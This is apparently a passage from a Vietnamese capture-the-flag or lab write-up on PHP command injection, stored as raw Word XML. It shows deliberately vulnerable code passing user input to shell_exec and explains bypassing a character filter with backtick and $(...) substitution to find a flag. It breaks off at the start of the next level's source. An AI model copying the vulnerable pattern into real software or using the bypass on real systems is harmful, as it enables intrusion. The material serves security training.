            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FEF711" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51593D1D" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"nslookup"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="678A57C7" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 nslookup </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="415649C1" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="26585080" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"dig"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2514FABF" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 dig </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E4265D" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BA0815F" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178FED36" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0ADE">
              <w:t>($result);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="078BDFFA" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1C2582" w14:textId="77777777" w:rsidR="00FC0ADE" w:rsidRPr="00FC0ADE" w:rsidRDefault="00FC0ADE" w:rsidP="00FC0ADE">
            <w:r w:rsidRPr="00FC0ADE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C38F031" w14:textId="77777777" w:rsidR="00C35326" w:rsidRDefault="00C35326" w:rsidP="00C35326">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB01865" w14:textId="1F6355A7" w:rsidR="003B25AC" w:rsidRDefault="00C35326" w:rsidP="00C35326">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C35326">
        <w:t xml:space="preserve">Level 3 này đã tiếp tục nâng cấp khả năng phòng thủ bằng cách lọc các ký tự đặc biệt thường dùng trong Command Injection như ;, &amp;, và |. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C2C063" w14:textId="111692F0" w:rsidR="00C35326" w:rsidRPr="008566A5" w:rsidRDefault="00C35326" w:rsidP="00C35326">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1361C7" w14:textId="5DEF3EEC" w:rsidR="00C63FE3" w:rsidRPr="00C63FE3" w:rsidRDefault="00C63FE3" w:rsidP="00C63FE3">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63FE3">
        <w:t>Bypass bằng cú pháp thay thế</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63FE3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63FE3">
        <w:t xml:space="preserve">ác kỹ thuật </w:t>
      </w:r>
      <w:r>
        <w:t>thực thi lệnh con</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63FE3">
        <w:t xml:space="preserve"> không bị chặn bởi strpos()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> như :</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63FE3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C63FE3">
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:t>...` và $</w:t>
      </w:r>
      <w:r w:rsidR="00D863F0">
        <w:t>(...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951B19D" w14:textId="5B9AD50D" w:rsidR="00C63FE3" w:rsidRPr="00C63FE3" w:rsidRDefault="00C63FE3" w:rsidP="00C63FE3">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325B4505" w14:textId="77777777" w:rsidR="00C35326" w:rsidRDefault="00C35326" w:rsidP="00C35326">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7273AD5A" w14:textId="77777777" w:rsidR="00C35326" w:rsidRPr="00184ED1" w:rsidRDefault="00C35326" w:rsidP="00C35326">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43958700" w14:textId="21B1F036" w:rsidR="00C35326" w:rsidRPr="00C35326" w:rsidRDefault="00D863F0">
      <w:r>
        <w:t>Thực hiện đưa payload ở bài 2 vào để kiểm tra khả năng phòng thủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071F963" w14:textId="613AE352" w:rsidR="00944684" w:rsidRDefault="00944684">
      <w:r w:rsidRPr="00944684">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2FB65A" wp14:editId="16BEAB1F">
            <wp:extent cx="5731510" cy="1066165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="624148806" name="Picture 1"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48806" name="Picture 1" descr="A white rectangular object with a black line&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1066165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF69614" w14:textId="6B2FCBB6" w:rsidR="00320FCC" w:rsidRPr="00867762" w:rsidRDefault="00320FCC" w:rsidP="00320FCC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ứng dụng đã </w:t>
      </w:r>
      <w:r w:rsidRPr="00867762">
        <w:t>phản hồi với thông báo "Hacker detected!"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Chứng tỏ dấu </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">các cách trước đó </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">đã </w:t>
      </w:r>
      <w:r>
        <w:t>không còn khả thi</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F852143" w14:textId="240F5665" w:rsidR="00D863F0" w:rsidRPr="00D863F0" w:rsidRDefault="00320FCC">
      <w:r>
        <w:t xml:space="preserve">Thực hiện chèn lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00F0059F">
        <w:t>con trong lệnh hiện tại thông qua cú pháp `...`</w:t>
      </w:r>
      <w:r w:rsidR="006724D1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B7E59" w14:textId="03235B20" w:rsidR="00944684" w:rsidRDefault="00944684">
      <w:r w:rsidRPr="00944684">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6B96B7" wp14:editId="4FB81F0C">
            <wp:extent cx="5731510" cy="1224915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1849105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05743" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1224915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9F0412" w14:textId="5B963904" w:rsidR="00BE2A26" w:rsidRDefault="00BE2A26" w:rsidP="00BE2A26">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Câu lệnh đã thực thì thành công và truyền kết quả vào câu lệnh nslookup để thực thi khiến cho nó bị lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D204B1" w14:textId="57502AC1" w:rsidR="00F47727" w:rsidRPr="00BE2A26" w:rsidRDefault="00F47727" w:rsidP="00BE2A26">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cuối cùng thực hiện tìm kiếm flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708ED7B2" w14:textId="26D65B4E" w:rsidR="00D65E83" w:rsidRDefault="00D65E83">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D65E83">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08799402" wp14:editId="0FF682BA">
            <wp:extent cx="5731510" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1488195866" name="Picture 1" descr="A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95866" name="Picture 1" descr="A white rectangular object with text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1013460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5C216" w14:textId="4EED6C08" w:rsidR="00D65E83" w:rsidRDefault="00D65E83">
      <w:r w:rsidRPr="00D65E83">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="055646BA" wp14:editId="50660EBA">
            <wp:extent cx="5731510" cy="956310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1642565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65911" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="956310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B148F4F" w14:textId="77777777" w:rsidR="00DB597E" w:rsidRDefault="00DB597E"/>
    <w:p w14:paraId="400D679F" w14:textId="77777777" w:rsidR="00F47727" w:rsidRDefault="00F47727">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC701DB" w14:textId="64D9D018" w:rsidR="00F47727" w:rsidRPr="00FF23DE" w:rsidRDefault="00F47727" w:rsidP="006C2EE6">
      <w:pPr>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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199EF5BE" w14:textId="77777777" w:rsidR="00F47727" w:rsidRPr="00FF23DE" w:rsidRDefault="00F47727" w:rsidP="00F47727">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566"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F14B30" w:rsidRPr="00F14B30" w14:paraId="744ED6E0" w14:textId="77777777" w:rsidTr="00E54E97">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="612B557A" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00E54E97">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F14B30">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="567B1165" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A574075" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1050B082" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02902334" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA3294D" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7508DD4D" w14:textId="6BECA568" w:rsidR="00B55CB4" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4051434B" w14:textId="77777777" w:rsidR="00E54E97" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F395848" w14:textId="709286FB" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00E54E97">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F14B30">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55FCBE16" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C153C9D" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35C33F15" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E57DF9F" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2AAC2E" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C1C3D3E" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6266803D" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115282CC" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25708F66" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A39F3E0" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4DBE94" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D950450" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D35505" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E716022" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E81BE7B" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5275757C" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EC1919" w14:textId="6B56A086" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398BC7B2" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4278DBEB" w14:textId="77777777" w:rsidR="00F14B30" w:rsidRPr="00F14B30" w:rsidRDefault="00F14B30" w:rsidP="00F14B30">
            <w:r w:rsidRPr="00F14B30">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>(isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>],$_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00F14B30">
              <w:t>])){</w:t>
            </w:r>
          </w:p>
